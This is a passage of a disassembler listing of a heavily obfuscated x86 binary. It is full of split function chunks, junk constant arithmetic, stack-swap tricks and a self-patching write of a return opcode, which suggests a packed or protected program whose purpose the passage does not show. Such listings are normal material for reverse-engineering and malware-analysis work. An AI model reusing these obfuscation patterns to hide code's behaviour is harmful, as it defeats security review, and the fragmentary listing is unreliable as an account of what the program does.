; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_441536:				; CODE XREF: sub_451E6D+42D9j
		jp	loc_45111C
		cmp	edi, 7412E384h
		jmp	loc_442A71
; END OF FUNCTION CHUNK	FOR sub_451E6D
; ---------------------------------------------------------------------------
		push	offset sub_447610
		jmp	locret_44A788
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_441551:				; CODE XREF: sub_43E60A:loc_43B93Dj
		xchg	ebp, edx
		shr	ebx, 1Ah
		add	edi, 0EB310105h
		pushf
		jmp	loc_43B608
; END OF FUNCTION CHUNK	FOR sub_43E60A
; ---------------------------------------------------------------------------

loc_441562:				; CODE XREF: hvvrg7ie:00442E30j
		test	eax, edx
		pop	edx
		jz	loc_458EFF
		jmp	loc_44EE23
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403D4

loc_441570:				; CODE XREF: sub_4403D4:loc_459698j
		push	esi
		mov	esi, ecx
		xchg	esi, [esp+4+var_4]
		mov	[ebp+var_4], eax
		mov	eax, [ebp+var_4]
		mov	al, [eax]
		jno	loc_44256B
		jmp	loc_457EE6
; END OF FUNCTION CHUNK	FOR sub_4403D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_441589:				; CODE XREF: sub_451E6D:loc_439F41j
		or	eax, 7544BC06h
		add	eax, 20043E1h
		call	sub_448DE4

loc_44159A:				; CODE XREF: hvvrg7ie:00442F92j
		jmp	loc_4505C3
; END OF FUNCTION CHUNK	FOR sub_451E6D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442642

loc_44159F:				; CODE XREF: sub_442642+Fj
		jmp	nullsub_41
; END OF FUNCTION CHUNK	FOR sub_442642

; =============== S U B	R O U T	I N E =======================================



sub_4415A4	proc near		; DATA XREF: hvvrg7ie:004462D8o
		mov	[ecx], eax
		xchg	edx, [esp+0]
sub_4415A4	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_453405

loc_4415A9:				; CODE XREF: sub_453405-15BC1j
		mov	ecx, edx
		push	offset loc_458E06
		jmp	loc_43CDA6
; END OF FUNCTION CHUNK	FOR sub_453405
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_4415B5:				; CODE XREF: sub_43F227+DD26j
		xchg	edx, [esi]
		cdq
		push	edx
		or	eax, 0BFFBE5DDh
		jmp	loc_452179
; END OF FUNCTION CHUNK	FOR sub_43F227

; =============== S U B	R O U T	I N E =======================================



sub_4415C4	proc near		; DATA XREF: sub_458374-1B8B1o

; FUNCTION CHUNK AT 00444D46 SIZE 00000007 BYTES

		push	0
		push	10h
		push	894CCD0Ch
		pop	eax
		rol	eax, 4
		add	eax, 0D5B8A2Ch
		add	eax, ebp
		add	eax, 5DD7A514h
		jmp	loc_444D46
sub_4415C4	endp

; ---------------------------------------------------------------------------

loc_4415E4:				; CODE XREF: hvvrg7ie:00439E4Dj
		and	eax, edi
		jge	loc_43D872
		cdq
; START	OF FUNCTION CHUNK FOR sub_459B45

loc_4415ED:				; CODE XREF: sub_459B45:loc_439E38j
		add	edx, 0B4B0CB3h
		xchg	edx, [esp+0]
		jmp	loc_446621
; END OF FUNCTION CHUNK	FOR sub_459B45
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_547. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CCA

loc_4415FC:				; CODE XREF: sub_448CCA+121Cj
		jmp	loc_457BCF
; END OF FUNCTION CHUNK	FOR sub_448CCA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_86. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C072

loc_441602:				; CODE XREF: sub_44C072-E94Fj
		jmp	sub_4584F2
; END OF FUNCTION CHUNK	FOR sub_44C072
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4571A0

loc_441607:				; CODE XREF: sub_439717:loc_43A49Bj
					; sub_4571A0:loc_444755j
		add	eax, 629099BDh
		call	sub_44059F
		mov	ds:off_41D040, eax
		lea	eax, sub_44A2AF
		mov	byte ptr [eax],	0C3h
		jmp	loc_454876
; END OF FUNCTION CHUNK	FOR sub_4571A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A2AF

loc_441626:				; CODE XREF: sub_44A2AFj
		xchg	ecx, [esp+0]
		mov	edx, ecx
		pop	ecx
		jmp	loc_44ADB0
; END OF FUNCTION CHUNK	FOR sub_44A2AF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_441631:				; CODE XREF: sub_440C05-3254j
		ja	loc_43A02F
		jmp	loc_455662
; END OF FUNCTION CHUNK	FOR sub_440C05
; ---------------------------------------------------------------------------

loc_44163C:				; CODE XREF: hvvrg7ie:00449B12j
		or	eax, 5F2B664Ch
		sub	eax, 0A82D5680h
		xor	eax, 0DD8A2C91h
		push	ebx
		jmp	loc_45749F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_441654:				; CODE XREF: sub_450F97+10FBj
		push	eax
		push	ecx
		push	223ADDB4h
		pop	ecx
		rol	ecx, 1
		xor	ecx, 4475BB6Fh
		xchg	ecx, [esp+4+var_4]
		call	sub_439AE3
		jmp	loc_447FC3
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------

loc_441671:				; CODE XREF: hvvrg7ie:loc_446C0Cj
					; hvvrg7ie:00446C23j
		add	esi, 673052CDh
		mov	[esi], eax
		push	offset loc_443AC8
		jmp	locret_439AF3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4541D4

loc_441683:				; CODE XREF: sub_4541D4+8j
		pushf
		push	0F4C59B66h
		pop	edi
		and	edi, 0C0BF0B4Ah
		rol	edi, 4

loc_441693:				; CODE XREF: sub_4440CB:loc_44D833j
		and	edi, 0ECF91CC1h
		xor	edi, 8501400h
		popf
		jmp	loc_448147
; END OF FUNCTION CHUNK	FOR sub_4541D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45061E

loc_4416A5:				; CODE XREF: sub_45061E:loc_4393B7j
		jz	loc_45566A
		jmp	loc_4510B4
; END OF FUNCTION CHUNK	FOR sub_45061E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4484E1

loc_4416B0:				; CODE XREF: sub_4484E1-C656j
		jz	loc_4572B3
		mov	esi, ebx

loc_4416B8:				; CODE XREF: sub_4484E1:loc_456D36j
		push	44BD534Ch
		pop	eax
		jmp	loc_441EFB
; END OF FUNCTION CHUNK	FOR sub_4484E1

; =============== S U B	R O U T	I N E =======================================



sub_4416C3	proc near		; CODE XREF: hvvrg7ie:0043FF0Bj
					; sub_451697-4ABFp
		xchg	esi, [esp+0]
		pop	esi
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_454F0C
		jmp	loc_446230
sub_4416C3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		or	ebp, ecx
		jmp	sub_43BFB4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4527A1

loc_4416DD:				; CODE XREF: sub_4527A1+1E35j
		xchg	ebx, eax

loc_4416DF:				; CODE XREF: sub_4527A1:loc_44D7F0j
		push	eax
		lea	eax, dword_43CE14
		push	eax
		push	edx
		jmp	loc_456214
; END OF FUNCTION CHUNK	FOR sub_4527A1
; ---------------------------------------------------------------------------
		sub	edi, esi
		jmp	loc_444C96
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ABA3

loc_4416F4:				; CODE XREF: sub_44ABA3-CD03j
		or	eax, 0BF5878B6h
		adc	ecx, ebp
		mov	esi, [ecx]

loc_4416FE:				; CODE XREF: sub_44ABA3:loc_43DA57j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_457651
		jmp	loc_44F472
; END OF FUNCTION CHUNK	FOR sub_44ABA3

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_44170F	proc near		; DATA XREF: sub_44398A:loc_448B89o
		jmp	sub_44F8F2
sub_44170F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E533

loc_441714:				; CODE XREF: sub_44E533-A727j
					; sub_44398A+172BEj
		xchg	esi, [esp+0]
		mov	ecx, esi
		pop	esi

loc_44171A:				; CODE XREF: sub_4554E8+1835j
		pop	ebp
		jmp	nullsub_245
; END OF FUNCTION CHUNK	FOR sub_44E533
; ---------------------------------------------------------------------------
		cmp	esi, 86F2ECCCh
		jmp	loc_45752C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439E6C

loc_44172B:				; CODE XREF: sub_439E6C+1D71Dj
		xchg	eax, [esp-4+arg_0]
		jmp	loc_45A82C
; END OF FUNCTION CHUNK	FOR sub_439E6C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_441733:				; CODE XREF: sub_450246-5341j
		pop	eax
		xchg	ecx, [esp+4+var_4]
		mov	ebp, ecx
		pop	ecx
		jmp	loc_456838
; END OF FUNCTION CHUNK	FOR sub_450246
; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, esp
		jmp	loc_456928
; ---------------------------------------------------------------------------

loc_441747:				; CODE XREF: hvvrg7ie:loc_45A9B2j
					; hvvrg7ie:0045A9C9j
		add	ebx, 11147523h
		mov	[ebx], eax
		xchg	edx, [esp]
		mov	ebx, edx
		pop	edx
		lea	eax, loc_450DDD
		jmp	loc_43B896
; ---------------------------------------------------------------------------

loc_441760:				; CODE XREF: hvvrg7ie:loc_44A7F7j
		sub	edx, 97D3369Ah
		and	edx, 81D0E8A1h
		or	edx, 92C11A8Fh
		xor	edx, 2AD67D4Ah
		add	edx, 65C5B66Ah

loc_44177E:				; CODE XREF: hvvrg7ie:loc_43BD68j
		add	edx, ebp
		add	edx, 0E122E1ADh
		mov	edx, [edx]
		jmp	loc_43B3AF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_284. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44543A

loc_44178E:				; CODE XREF: sub_44543A-AC71j
		jp	loc_4461F7

loc_441794:				; CODE XREF: sub_44543A:loc_448B13j
		xor	edi, 0C845BFD0h
		add	edi, 21BB6430h
		xchg	edi, [esp+8+var_8]
		push	0FFFFFFFFh
		push	0
		call	sub_43B7B1
		jmp	loc_43C3B4
; END OF FUNCTION CHUNK	FOR sub_44543A

; =============== S U B	R O U T	I N E =======================================



sub_4417B1	proc near		; CODE XREF: hvvrg7ie:00451E11j
					; sub_440C61+14B0Bp

; FUNCTION CHUNK AT 0043BD3A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043CF8D SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004418D7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044829C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448460 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452568 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00454956 SIZE 00000018 BYTES

		xchg	edi, [esp+0]
		pop	edi
		xor	edx, edx

loc_4417B7:				; CODE XREF: hvvrg7ie:0044204Ej
		call	sub_439953

loc_4417BC:				; CODE XREF: sub_449CB1-65CDj
		jmp	loc_448460
sub_4417B1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_4417C1:				; CODE XREF: sub_444BE1-286Bj
		jmp	loc_45938C
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4413A5

loc_4417C6:				; CODE XREF: sub_4413A5+Cj
		jmp	loc_43FF73
; END OF FUNCTION CHUNK	FOR sub_4413A5
; ---------------------------------------------------------------------------

loc_4417CB:				; CODE XREF: hvvrg7ie:loc_454A09j
		pop	edi
		xor	edi, 81F28FAh
		or	edi, 89AF100Ch
		add	edi, 0CC71A09h
		and	edi, 4B5AA8F7h
		add	edi, 0B83FC89Ah
		mov	[edi], eax
		pop	edi
		jmp	loc_44C21E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4498FB

loc_4417F2:				; CODE XREF: sub_4498FB+7FD7j
		test	ebp, esi
		jmp	loc_452C60
; END OF FUNCTION CHUNK	FOR sub_4498FB
; ---------------------------------------------------------------------------
		cmp	dword ptr [ebp-0Ch], 0
		jz	loc_44AF67
		jmp	loc_43A0A6
; ---------------------------------------------------------------------------

loc_441808:				; DATA XREF: sub_450434-60F9o
		push	0F8480F96h
		pop	ebx
		add	ebx, 894DDD6Fh
		test	ebx, 2000000h
		jmp	loc_4573BE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_266. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A7E8

loc_441820:				; CODE XREF: sub_45A7E8-10E49j
		jmp	loc_445578
; END OF FUNCTION CHUNK	FOR sub_45A7E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456C1B

loc_441825:				; CODE XREF: sub_456C1B+9j
		add	edx, ebx
		rol	edx, 5
		xor	edx, ecx
		rol	edx, 5
		push	offset sub_4470A9
		jmp	loc_43BF1E
; END OF FUNCTION CHUNK	FOR sub_456C1B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CA9C

loc_441839:				; CODE XREF: sub_44CA9C:loc_4565FAj
		push	esi
		push	650365C7h
		pop	esi
		and	esi, 0E153C964h
		xor	esi, 0BA8D09C4h
		add	esi, ebp
		add	esi, 2471B770h
		jmp	loc_44C7BE
; END OF FUNCTION CHUNK	FOR sub_44CA9C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6D7

loc_441859:				; CODE XREF: sub_44A6D7+9ADDj
		jz	loc_4471A2
		push	4893DD05h
; END OF FUNCTION CHUNK	FOR sub_44A6D7
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_441864:				; CODE XREF: sub_44E3B3:loc_4449F2j
		push	58AD41F6h
		xchg	ebx, [esp+4+var_4]
		mov	eax, ebx
		not	ebx
		jmp	loc_452EF1
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_441875:				; CODE XREF: sub_446D8D+4737j
		add	ebx, 0D276467Fh
		xchg	ebx, [esp+4+var_4]
		jmp	loc_441991
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
		mov	ecx, edx
		jmp	sub_4401C9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD0B

loc_44188A:				; CODE XREF: sub_43CD0B+125CFj
		sub	eax, 2B1E12D6h
		add	eax, 0E276CC8Dh
		add	eax, ebp
		add	eax, 8BD5C66h
		jmp	loc_44E46F
; END OF FUNCTION CHUNK	FOR sub_43CD0B
; ---------------------------------------------------------------------------

loc_4418A3:				; CODE XREF: hvvrg7ie:0043D024j
		sub	edi, 0BD28E660h
		jmp	loc_43FB4A
; ---------------------------------------------------------------------------

loc_4418AE:				; CODE XREF: hvvrg7ie:0044767Ej
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		jmp	loc_44277F
; ---------------------------------------------------------------------------

loc_4418BA:				; CODE XREF: hvvrg7ie:0044B308j
		sub	eax, 73BBBFFh

; =============== S U B	R O U T	I N E =======================================



sub_4418C0	proc near		; CODE XREF: sub_4443AA-8250p

; FUNCTION CHUNK AT 004582E3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AF8C SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	0
		mov	edx, esp
		push	edx
		push	0
		jmp	loc_4582E3
sub_4418C0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CB5

loc_4418D0:				; CODE XREF: sub_445CB5+E7D0j
		sbb	ecx, eax
		jmp	loc_44A7B0
; END OF FUNCTION CHUNK	FOR sub_445CB5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4417B1

loc_4418D7:				; CODE XREF: sub_4417B1+131B8j
		add	eax, 3B10982Dh
		rol	eax, 1Eh

loc_4418E0:				; CODE XREF: hvvrg7ie:loc_447341j
		xor	eax, 4A987DD7h

loc_4418E6:				; CODE XREF: sub_45061E:loc_43D50Aj
		call	sub_45535C
; END OF FUNCTION CHUNK	FOR sub_4417B1
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_4418EB:				; CODE XREF: sub_44059F+5D6j
		jmp	loc_45250C
; END OF FUNCTION CHUNK	FOR sub_44059F

; =============== S U B	R O U T	I N E =======================================



sub_4418F0	proc near		; CODE XREF: sub_450434-35CDp
					; hvvrg7ie:004588E3j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C7CE SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00442575 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446F37 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044F7C3 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00452BCF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004560C6 SIZE 00000010 BYTES

		xchg	eax, [esp+0]
		pop	eax
		cmp	byte ptr [eax],	0F1h
		jnz	loc_4560CB
		jmp	loc_452BCF
sub_4418F0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_441902:				; CODE XREF: hvvrg7ie:004451C4j
		shr	esi, 1Fh
; START	OF FUNCTION CHUNK FOR sub_454099

loc_441905:				; CODE XREF: sub_454099:loc_441455j
		sub	ebp, ecx

loc_441907:				; CODE XREF: sub_444BE1:loc_4451B1j
		or	edi, 9AD92DC1h
		add	edi, 6468A1AFh
		push	offset loc_447A68

loc_441918:				; CODE XREF: hvvrg7ie:loc_451170j
		jmp	nullsub_369
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------

loc_44191D:				; CODE XREF: hvvrg7ie:00446A76j
		and	eax, ecx

; =============== S U B	R O U T	I N E =======================================



sub_44191F	proc near		; CODE XREF: sub_43F4BC+9p

var_130		= dword	ptr -130h

; FUNCTION CHUNK AT 004390CE SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00439BDA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043ADEC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043AE7D SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0043B4CB SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043D42C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043D699 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E8A3 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043EA3A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F179 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043F89A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043FAA9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FBDD SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044358C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444777 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00444DAD SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00447301 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447CCF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044970D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AE9A SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044B01A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044B0E2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BD83 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BE0F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044EB8E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F5CC SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004508F0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450DDD SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00452538 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004530F2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456831 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004569A3 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004570CE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457D2A SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045ACDF SIZE 0000000B BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		add	esp, 0FFFFFED0h
		push	edx
		push	67E08E28h
		pop	edx
		jmp	loc_43FBDD
sub_44191F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4413A5

loc_441935:				; CODE XREF: sub_4413A5+C9F3j
		xchg	eax, [esp+0]
		mov	esi, eax
		xchg	esi, [esp+0]
		mov	eax, edx
		call	sub_455751
		mov	eax, [esp+0]
		jmp	loc_45A324
; END OF FUNCTION CHUNK	FOR sub_4413A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_44194C:				; CODE XREF: sub_43F227+182E2j
		shr	ebp, 14h
		pushf
		jmp	loc_450FA0
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_441955:				; CODE XREF: sub_44D2F8:loc_45129Bj
		push	0F672B355h
		mov	eax, [edx]
		jmp	loc_439FD7
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AD46

loc_441961:				; CODE XREF: sub_45AD46+1j
		mov	ebp, esp
		add	esp, 0FFFFFF90h

loc_441966:				; CODE XREF: sub_43B3BE:loc_441EB5j
		call	sub_44DE0A
		push	2D44FBD9h
		pop	edx
		jmp	loc_43B8B4
; END OF FUNCTION CHUNK	FOR sub_45AD46
; ---------------------------------------------------------------------------

loc_441976:				; CODE XREF: hvvrg7ie:0043D79Aj
		push	23B63456h
		pop	ebx
		or	ebx, 53AD15D1h
		add	ebx, 8C829A91h
		mov	[ebx], eax
		pop	ebx
		jmp	loc_43FE4C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_490. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_441991:				; CODE XREF: sub_446D8D-550Fj
		jmp	sub_456DE7
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------

loc_441996:				; CODE XREF: hvvrg7ie:00454F3Fj
		js	loc_44DDD7
; START	OF FUNCTION CHUNK FOR sub_456881

loc_44199C:				; CODE XREF: sub_456881+Ej
		and	ebx, 14B34C34h
		add	ebx, 0FBA46CC1h
		rol	ebx, 0Eh
		test	ebx, 20000000h
		jmp	loc_43D69E
; END OF FUNCTION CHUNK	FOR sub_456881
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449CB1

loc_4419B6:				; CODE XREF: sub_449CB1:loc_455076j
		shl	ecx, 1Fh
		jmp	loc_456CE5
; END OF FUNCTION CHUNK	FOR sub_449CB1
; ---------------------------------------------------------------------------

loc_4419BE:				; CODE XREF: hvvrg7ie:00451A70j
		not	esi

; =============== S U B	R O U T	I N E =======================================



sub_4419C0	proc near		; CODE XREF: sub_444B4D+9p

; FUNCTION CHUNK AT 0043934C SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043ADFF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E2AD SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004597EC SIZE 00000028 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	16F79370h
		pop	eax
		or	eax, 0D9216DC5h
		rol	eax, 0Fh
		add	eax, 0DA4941C5h
		jmp	loc_4597EC
sub_4419C0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		adc	esi, ecx
		push	ecx
		jmp	sub_457774
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_4419E6:				; CODE XREF: sub_44059F:loc_4525D5j
		jz	loc_4530C2

loc_4419EC:				; CODE XREF: sub_44BCAE-D2EEj
		jmp	nullsub_449
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------
		test	ecx, 0AB0E8380h
		jmp	loc_442042
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_169. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4419FD:				; CODE XREF: hvvrg7ie:0045103Ej
		jl	loc_439AB0
; START	OF FUNCTION CHUNK FOR sub_43E741

loc_441A03:				; CODE XREF: sub_43E741+Ej
		jmp	nullsub_490
; END OF FUNCTION CHUNK	FOR sub_43E741
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D824

loc_441A08:				; CODE XREF: sub_43D824+13j
		jmp	nullsub_542
; END OF FUNCTION CHUNK	FOR sub_43D824
; ---------------------------------------------------------------------------
		mov	edi, 372F66FDh
		xchg	edi, eax
		push	ecx
		jmp	loc_439AB0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AF30

loc_441A1A:				; CODE XREF: hvvrg7ie:00445D6Cj
					; sub_43AF30:loc_45B18Cj
		xor	edi, 0BE7BAD07h
		or	edi, ds:4000F6h
		add	edi, 59E156h
		mov	[edi], eax
		jmp	loc_451E9A
; END OF FUNCTION CHUNK	FOR sub_43AF30
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_441A33:				; CODE XREF: sub_43B3BE+DF0Fj
		shr	edx, 6
		sub	ebx, ebp
		add	ebp, 46EA3095h
		test	edi, 89360066h
		jmp	loc_4447F0
; END OF FUNCTION CHUNK	FOR sub_43B3BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C290

loc_441A49:				; CODE XREF: sub_43C290+11F80j
		jb	loc_4424EE

loc_441A4F:				; CODE XREF: sub_43C290:loc_442B51j
		push	328AC83Dh
		pop	eax
		rol	eax, 1
		and	eax, 7BFF7196h
		jmp	loc_44A777
; END OF FUNCTION CHUNK	FOR sub_43C290
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_310. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_441A63:				; CODE XREF: sub_444BE1:loc_456257j
		jnb	loc_440CC1
		jmp	loc_44A748
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------

loc_441A6E:				; CODE XREF: hvvrg7ie:00459D11j
		and	ebp, esi

; =============== S U B	R O U T	I N E =======================================



sub_441A70	proc near		; CODE XREF: sub_440C05:loc_43A02Fp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0044229C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045449C SIZE 0000000E BYTES

		xchg	edi, [esp+0]
		pop	edi
		xchg	edi, [esp-4+arg_0]
		mov	ebp, edi
		pop	edi
		xchg	edx, [esp-8+arg_4]
		jmp	loc_44229C
sub_441A70	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_441A82:				; CODE XREF: hvvrg7ie:00454578j
		ja	loc_453D65
		ror	eax, 5
		jmp	sub_44A1D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_441A90:				; CODE XREF: sub_442FD1-8B8j
		add	ebx, ebp
		add	ebx, 76D1A3DFh
		mov	ebx, [ebx]
		add	eax, ebx
		pop	ebx
		jmp	loc_44AADB
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_441AA2:				; CODE XREF: sub_440643+17E8Ej
		ror	eax, 3
		push	ebx
		push	9439AECFh
		and	ebx, eax
		jmp	loc_45A169
; END OF FUNCTION CHUNK	FOR sub_440643

; =============== S U B	R O U T	I N E =======================================



sub_441AB2	proc near		; DATA XREF: hvvrg7ie:0044C41Do

; FUNCTION CHUNK AT 00442A29 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004479E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E111 SIZE 0000000E BYTES

		push	1B8FD677h
		pop	edx
		or	edx, 0D9ED9E22h
		test	edx, 1000000h
		jmp	loc_442A29
sub_441AB2	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A91B

loc_441AC9:				; CODE XREF: sub_45A91B:loc_44CB80j
		xchg	eax, [esp+0]

loc_441ACC:				; CODE XREF: hvvrg7ie:0043B92Cj
		xor	edx, ebp
		jmp	loc_45860A
; END OF FUNCTION CHUNK	FOR sub_45A91B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_441AD3:				; CODE XREF: sub_45B048:loc_43F4EEj
		add	esp, 4
		push	0D81573D6h
		pop	eax
		sub	eax, 0E35C6B0Dh
		add	eax, 0B46F788h
		call	sub_457C82
		jmp	loc_4454B1
; END OF FUNCTION CHUNK	FOR sub_45B048
; ---------------------------------------------------------------------------
		jmp	loc_451373
